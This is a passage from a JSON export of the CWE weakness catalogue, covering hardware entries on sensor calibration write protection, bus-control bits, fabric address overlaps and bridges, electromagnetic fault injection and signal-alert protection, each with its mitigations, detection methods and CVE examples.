Memory","DoS: Crash, Exit, or Restart","DoS: Instability","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Alter Execution Logic","Quality Degradation","Unexpected State","Reduce Performance","Reduce Reliability"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Insert restrictions on when the hardware\'s test or debug features can be activated. For example, during normal operating modes, the hardware\'s privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations."},{"Phase":"Implementation","Description":"Insert restrictions on when the hardware\'s test or debug features can be activated. For example, during normal operating modes, the hardware\'s privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations."},{"Phase":"Integration","Description":"Insert restrictions on when the hardware\'s test or debug features can be activated. For example, during normal operating modes, the hardware\'s privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"121"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Brent Sherman","Submission_Organization":"Accellera IP Security Assurance (IPSA) Working Group","Submission_Date":"2020-08-06"}}},"1314":{"attr":{"@_ID":"1314","@_Name":"Missing Write Protection for Parametric Data Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure.","Extended_Description":{"xhtml:p":["Various sensors are used by hardware to detect any devices operating outside of the design limits. The threshold limit values are set by hardware fuses or trusted software such as the BIOS. These limits may be related to thermal, power, voltage, current, and frequency. Hardware mechanisms may be used to protect against alteration of the threshold limit values by untrusted software.","The limit values are generally programmed in standard units for the type of value being read. However, the hardware-sensor blocks may report the settings in different units depending upon sensor design and operation. The raw sensor output value is converted to the desired units using a scale conversion based on the parametric data programmed into the sensor. The final converted value is then compared with the previously programmed limits.","While the limit values are usually protected, the sensor parametric data values may not be. By changing the parametric data, safe operational limits may be bypassed."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1299","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The lack of a requirement to protect parametric values may contribute to this weakness."},{"Phase":"Implementation","Note":"The lack of parametric value protection may be a cause of this weakness."}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["Quality Degradation","DoS: Resource Consumption (Other)"],"Likelihood":"High","Note":"Sensor value manipulation, particularly thermal or power, may allow physical damage to occur or disabling of the device by a false fault shutdown causing a Denial-Of-Service."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Access controls for sensor blocks should ensure that only trusted software is allowed to change threshold limits and sensor parametric data.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Malicious software executes instructions to increase power consumption to the highest possible level while causing the clock frequency to increase to its maximum value.\\n\\t\\t\\t\\t\\t\\t\\tSuch a program executing for an extended period of time would likely overheat the device, possibly resulting in permanent damage to the device.","A ring, oscillator-based temperature sensor will generally report the sensed value as\\n\\t\\t\\t\\t\\t\\t\\toscillator frequency rather than degrees centigrade.  The temperature sensor will have\\n\\t\\t\\t\\t\\t\\t\\tcalibration values that are used to convert the detected frequency into the corresponding temperature in degrees centigrade.","Consider a SoC design where the critical maximum temperature limit is set in fuse values to 100C and\\n\\t\\t\\t\\t\\t\\t\\tis not modifiable by software.  If the scaled thermal sensor output equals or exceeds this limit, the system is commanded to shut itself down.","The thermal sensor calibration values are programmable through registers that are exposed to system software.\\n\\t\\t\\t\\t\\t\\tThese registers allow software to affect the converted temperature output such that the output will never exceed the maximum temperature limit."]},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["The sensor frequency value is scaled by applying the function:","where a and b are the programmable calibration data coefficients. Software sets a and b to zero ensuring the sensed\\n\\t\\t\\t\\t\\t\\t\\ttemperature is always zero."],"xhtml:div":{"#text":"Sensed Temp = a + b * Sensor Freq","attr":{"@_style":"margin-left:10px;"}}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:p":["The sensor frequency value is scaled by applying the function:","where a and b are the programmable calibration data coefficients. Untrusted software is prevented from changing the values of either a or b, \\n\\t\\t\\t\\t\\t\\t\\tpreventing this method of manipulating the temperature."],"xhtml:div":{"#text":"Sensed Temp = a + b * Sensor Freq","attr":{"@_style":"margin-left:10px;"}}}],"Body_Text":"This weakness may be addressed by preventing access to a and b."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-8252","Description":"Kernel can inject faults in computations during the execution of TrustZone leading to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice and Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8252"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1082"}}},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi","Submission_Organization":"The Intel Corporation","Submission_Date":"2020-07-14"}}},"1315":{"attr":{"@_ID":"1315","@_Name":"Improper Setting of Bus Controlling Capability in Fabric End-point","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The bus controller enables bits in the fabric end-point to allow responder devices to control transactions on the fabric.","Extended_Description":{"xhtml:p":"To support reusability, certain fabric interfaces and end points provide a configurable register bit that allows IP blocks connected to the controller to access other peripherals connected to the fabric. This allows the end point to be used with devices that function as a controller or responder. If this bit is set by default in hardware, or if firmware incorrectly sets it later, a device intended to be a responder on a fabric is now capable of controlling transactions to other devices and might compromise system security."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"System Configuration"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Modify Memory","Read Memory","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability."},{"Phase":"Implementation","Description":"For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability."},{"Phase":"System Configuration","Description":"For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A typical, phone platform consists of the main, compute core or CPU, a DRAM-memory chip, an audio codec, a baseband modem, a power-management-integrated circuit (\u201cPMIC\u201d), a connectivity (WiFi and Bluetooth) modem, and several other analog/RF components. The main CPU is the only component that can control transactions, and all the other components are responder-only devices. All the components implement a PCIe end-point to interface with the rest of the platform. The responder devices should have the bus-control-enable bit in the PCIe-end-point register set to 0 in hardware to prevent the devices from controlling transactions to the CPU or other peripherals.","Body_Text":["The audio-codec chip does not have the bus-controller-enable-register bit hardcoded to 0.  There is no platform-firmware flow to verify that the bus-controller-enable bit is set to 0 in all responders.","Audio codec can now master transactions to the CPU and other platform components. Potentially, it can modify assets in other platform components to subvert system security.","Platform firmware includes a flow to check the configuration of bus-controller-enable bit in all responder devices. If this register bit is set on any of the responders, platform firmware sets it to 0. Ideally, the default value of this register bit should be hardcoded to 0 in RTL. It should also have access control to prevent untrusted entities from setting this bit to become bus controllers."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1135"}},{"attr":{"@_External_Reference_ID":"REF-1136"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-19"}}},"1316":{"attr":{"@_ID":"1316","@_Name":"Fabric-Address Map Allows Programming of Unwarranted Overlaps of Protected and Unprotected Ranges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The address map of the on-chip fabric has protected and unprotected regions overlapping, allowing an attacker to bypass access control to the overlapping portion of the protected region.","Extended_Description":{"xhtml:p":["Various ranges can be defined in the system-address map, either in the memory or in Memory-Mapped-IO (MMIO) space. These ranges are usually defined using special range registers that contain information, such as base address and size. Address decoding is the process of determining for which range the incoming transaction is destined. To ensure isolation, ranges containing secret data are access-control protected.","Occasionally, these ranges could overlap. The overlap could either be intentional (e.g. due to a limited number of range registers or limited choice in choosing size of the range) or unintentional (e.g. introduced by errors). Some hardware designs allow dynamic remapping of address ranges assigned to peripheral MMIO ranges. In such designs, intentional address overlaps can be created through misconfiguration by malicious software. When protected and unprotected ranges overlap, an attacker could send a transaction and potentially compromise the protections in place, violating the principle of least privilege."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Read Memory","Modify Memory"],"Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"Review address map in specification to see if there are any overlapping ranges.","Effectiveness":"High"},{"Method":"Manual Static Analysis","Description":"Negative testing of access control on overlapped ranges.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting the address map of the chip, ensure that protected and unprotected ranges are isolated and do not overlap. When designing, ensure that ranges hardcoded in Register-Transfer Level (RTL) do not overlap."},{"Phase":"Implementation","Description":"Ranges configured by firmware should not overlap. If overlaps are mandatory because of constraints such as a limited number of registers, then ensure that no assets are present in the overlapped portion."},{"Phase":"Testing","Description":"Validate mitigation actions with robust testing."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An on-chip fabric supports a 64KB address space that is memory-mapped. The fabric has two range registers that support creation of two protected ranges with specific size constraints--4KB, 8KB, 16KB or 32KB. Assets that belong to user A require 4KB, and those of user B require 20KB.  Registers and other assets that are not security-sensitive require 40KB.  One range register is configured to program 4KB to protect user A\u2019s assets. Since a 20KB range cannot be created with the given size constraints, the range register for user B\u2019s assets is configured as 32KB. The rest of the address space is left as open. As a result, some part of untrusted and open-address space overlaps with user B range.","Body_Text":["The fabric does not support least privilege, and an attacker can send a transaction to the overlapping region to tamper with user B data.","Since range B only requires 20KB but is allotted 32KB, there is 12KB of reserved space.  Overlapping this region of user B data, where there are no assets, with the untrusted space will prevent an attacker from tampering with user B data."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-4419","Description":"Attacker can modify MCHBAR register to overlap with an attacker-controlled region, which modification prevents the SENTER instruction from properly applying VT-d protection while a Measured Launch Environment is being launched.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4419"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1137"}}},"Notes":{"Note":{"#text":"As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-06-01"}}},"1317":{"attr":{"@_ID":"1317","@_Name":"Missing Security Checks in Fabric Bridge","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master.  Similarly, it does not check the hardware identity of the transaction received from the slave interface of the bridge.","Extended_Description":{"xhtml:p":["In hardware designs, different IP blocks are connected through interconnect-bus fabrics (e.g. AHB and OCP). Within a System on Chip (SoC), the IP block subsystems could be using different bus protocols. In such a case, the IP blocks are then linked to the central bus (and to other IP blocks) through a fabric bridge. Bridges are used as bus-interconnect-routing modules that link different protocols or separate, different segments of the overall SoC interconnect.","For overall system security, it is important that the access-control privileges associated with any fabric transaction are consistently maintained and applied, even when they are routed or translated by a fabric bridge. A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master and results in a weakness in SoC access-control security. The same weakness occurs if a bridge does not check the hardware identity of the transaction received from the slave interface of the bridge."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Bypass Protection Mechanism","Read Memory","Modify Memory"],"Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"RTL simulation to ensure that bridge-access controls are implemented properly.","Effectiveness":"High"},{"Method":"Manual Static Analysis","Description":"Formal verification of bridge RTL to ensure that access control cannot be bypassed.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design includes provisions for access-control checks in the bridge for both upstream and downstream transactions."},{"Phase":"Implementation","Description":"Implement access-control checks in the bridge for both upstream and downstream transactions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The iLPC2AHB bridge connects a CPU (with multiple, privilege levels, such as user, super user, debug, etc.) over AHB interface to an LPC bus. Several peripherals are connected to the LPC bus. The bridge is expected to check the privilege level of the transactions initiated in the core before forwarding them to the peripherals on the LPC bus.","Body_Text":["The bridge does not implement the checks and allows reads and writes from all privilege levels.","To address this, designers should implement hardware-based checks that are either hardcoded to block untrusted agents from accessing secure peripherals or implement firmware flows that configure the bridge to block untrusted agents from making arbitrary reads or writes."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-6260","Description":"Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC\'s physical address space from the host, and possibly the network [REF-1138].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"122"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1138"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-19"}}},"1318":{"attr":{"@_ID":"1318","@_Name":"Missing Support for Security Features in On-chip Fabrics or Buses","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"On-chip fabrics or buses either do not support or are not configured to support privilege separation or other security features, such as access control.","Extended_Description":{"xhtml:p":"Certain on-chip fabrics and buses, especially simple and low-power buses, do not support security features.  Apart from data transfer and addressing ports, some fabrics and buses do not have any interfaces to transfer privilege, immutable identity, or any other security attribute coming from the bus master.  Similarly, they do not have dedicated signals to transport security-sensitive data from slave to master, such as completions for certain types of transactions.  Few other on-chip fabrics and buses support security features and define specific interfaces/signals for transporting security attributes from master to slave or vice-versa.  However, including these signals is not mandatory and could be left unconfigured when generating the register-transfer-level (RTL) description for the fabric.  Such fabrics or buses should not be used to transport any security attribute coming from the bus master.  In general, peripherals with security assets should not be connected to such buses before the transaction from the bus master reaches the bus, unless some form of access control is performed at a fabric bridge or another intermediate module."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Read Memory","Modify Memory"],"Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Review the fabric specification and ensure that it contains signals to transfer security-sensitive signals.","Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":"Lack of security features can also be confirmed through manual RTL review of the fabric RTL.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"If fabric does not support security features, implement security checks in a bridge or any component that is between the master and the fabric.  Alternatively, connect all fabric slaves that do not have any security assets under one such fabric and connect peripherals with security assets to a different fabric that supports security features."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Several systems on chips (SoCs) use the Advanced-Microcontroller Bus Architecture (AMBA) Advanced-Peripheral Bus (APB) protocol.  APB is a simple, low-power bus and uses the PPROT[2:0] bits to indicate the security state of the bus masters ;PPROT[0] indicates privilege, PPROT[1] indicates secure/non-secure transaction, and PPROT[2] indicates instruction/data.  Assume that there is no fabric bridge in the SoC. One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits.","Body_Text":["The APB bus is used to connect several bus masters, each with a unique and immutable hardware identity, to several slaves. For a CPU supporting 8 potential identities (each with varying privilege levels), 16 types of outgoing transactions can be made--8 read transactions with each supported privilege level and 8 write transactions with each supported privilege level.","Since APB PPROT can only support up to 8 transaction types, access-control checks cannot be performed on transactions going to the slaves at the right granularity for all possible transaction types.  Thus, potentially, user code running on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device, resulting in permanent denial of service.","In this scenario, only peripherals that need access protection from 8 of the 16 possible transaction types can be connected to the APB bus. Peripherals that require protection from the remaining 8 transaction types can be connected to a different APB bus. Alternatively, a bridge could be implemented to handle such complex scenarios before forwarding traffic to the APB bus."]},{"Intro_Text":"The Open-Core-Protocol (OCP) fabric supports two configurable, width-optional signals for transporting security attributes: MReqInfo and SRespInfo.  MReqInfo is used to transport security attributes from bus master to slave, and SRespInfo is used to transport security attributes from slave to bus master. An SoC uses OCP to connect several bus masters, each with a unique and immutable hardware identity, to several slaves.  One of the bus masters, the CPU, reports the privilege level (user or super user) in addition to the unique identity.  One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits.","Body_Text":["Since MReqInfo and SRespInfo are not mandatory, these signals are not configured when autogenerating RTL for the OCP fabric.  Thus, the fabric cannot be used to transport security attributes from bus masters to slave.","Code running at user-privilege level on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device and cause permanent denial of service.","To address this, configure the fabric to include MReqInfo and SRespInfo signals and use these to transport security identity and privilege level to perform access-control checks at the slave interface."]}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1139"}},{"attr":{"@_External_Reference_ID":"REF-1140"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-20"}}},"1319":{"attr":{"@_ID":"1319","@_Name":"Improper Protection against Electromagnetic Fault Injection (EM-FI)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The device is susceptible to electromagnetic fault injection attacks, causing device internal information to be compromised or security mechanisms to be bypassed.","Extended_Description":{"xhtml:p":"Electromagnetic fault injection may allow an attacker to locally and dynamically modify the signals (both internal and external) of an integrated circuit. EM-FI attacks consist of producing a local, transient magnetic field near the device, inducing current in the device wires. A typical EMFI setup is made up of a pulse injection circuit that generates a high current transient in an EMI coil, producing an abrupt magnetic pulse which couples to the target producing faults in the device, which can lead to:","xhtml:ul":{"xhtml:li":["Bypassing security mechanisms such as secure JTAG or Secure Boot","Leaking device information","Modifying program flow","Perturbing secure hardware modules (e.g. random number generators)"]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Test/Debug IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Availability"],"Impact":["Modify Memory","Read Memory","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["1. Redundancy \u2013 By replicating critical operations and comparing the two outputs can help indicate whether a fault has been injected.","2. Error detection and correction codes - Gay, Mael, et al. proposed a new scheme that not only detects faults injected by a malicious adversary but also automatically corrects single nibble/byte errors introduced by low-multiplicity faults.","3. Fail by default coding - When checking conditions (switch or if) check all possible cases and fail by default because the default case in a switch (or the else part of a cascaded if-else-if construct) is used for dealing with the last possible (and valid) value without checking. This is prone to fault injection because this alternative is easily selected as a result of potential data manipulation [REF-1141].","4. Random Behavior - adding random delays before critical operations, so that timing is not predictable.","5. Program Flow Integrity Protection \u2013 The program flow can be secured by integrating run-time checking aiming at detecting control flow inconsistencies. One such example is tagging the source code to indicate the points not to be bypassed [REF-1147].","6. Sensors \u2013 Usage of sensors can detect variations in voltage and current.","7. Shields \u2013 physical barriers to protect the chips from malicious manipulation."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In many devices, security related information is stored in fuses. These fuses are loaded into shadow registers at boot time. Disturbing this transfer phase with EM-FI can lead to the shadow registers storing erroneous values potentially resulting in reduced security.","Body_Text":"Colin O\'Flynn has demonstrated an attack scenario which uses electro-magnetic glitching during booting to bypass security and gain read access to flash, read and erase access to shadow memory area (where the private password is stored). Most devices in the MPC55xx and MPC56xx series that include the Boot Assist Module (BAM) (a serial or CAN bootloader mode) are susceptible to this attack. In this paper, a GM ECU was used as a real life target. While the success rate appears low (less than 2 percent), in practice a success can be found within 1-5 minutes once the EMFI tool is setup. In a practical scenario, the author showed that success can be achieved within 30-60 minutes from a cold start."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1141"}},{"attr":{"@_External_Reference_ID":"REF-1142"}},{"attr":{"@_External_Reference_ID":"REF-1143"}},{"attr":{"@_External_Reference_ID":"REF-1144"}},{"attr":{"@_External_Reference_ID":"REF-1145"}},{"attr":{"@_External_Reference_ID":"REF-1146"}},{"attr":{"@_External_Reference_ID":"REF-1147"}}]},"Notes":{"Note":{"#text":"This entry is attack-oriented and may require significant modification in future versions, or even deprecation. It is not clear whether there is really a design \\"mistake\\" that enables such attacks, so this is not necessarily a weakness and may be more appropriate for CAPEC.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Sebastien Leger, Rohini Narasipur","Submission_Organization":"Bosch","Submission_Date":"2020-08-27"}}},"1320":{"attr":{"@_ID":"1320","@_Name":"Improper Protection for Out of Bounds Signal Level Alerts","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Untrusted agents can disable alerts about signal conditions exceeding limits or the response mechanism that handles such alerts.","Extended_Description":{"xhtml:p":["Hardware sensors are used to detect whether a device is operating within design limits. The threshold values for these limits are set by hardware fuses or trusted software such as a BIOS.  \\n\\t\\t\\t\\tModification of these limits may be protected by hardware mechanisms.","When device sensors detect out of bound conditions, alert signals may be generated for remedial action, which may take the form of device shutdown or throttling.","Warning signals that are not properly secured may be disabled or used to generate spurious alerts, causing degraded performance or denial-of-service (DoS).\\n\\t\\t\\t\\tThese alerts may be masked by untrusted software. Examples of these alerts involve thermal and power sensor alerts."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Test/Debug IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Instability","DoS: Crash, Exit, or Restart","Reduce Reliability","Unexpected State"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Alert signals generated by critical events should be protected from access by untrusted agents. Only hardware or trusted firmware modules should be able to alter the alert configuration."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a platform design where a Digital-Thermal Sensor (DTS) is used to monitor temperature and compare that output against a threshold value.\\n\\t\\t\\t\\t\\t\\t\\tIf the temperature output equals or exceeds the threshold value, the DTS unit sends an alert signal to the processor.","The processor, upon getting the 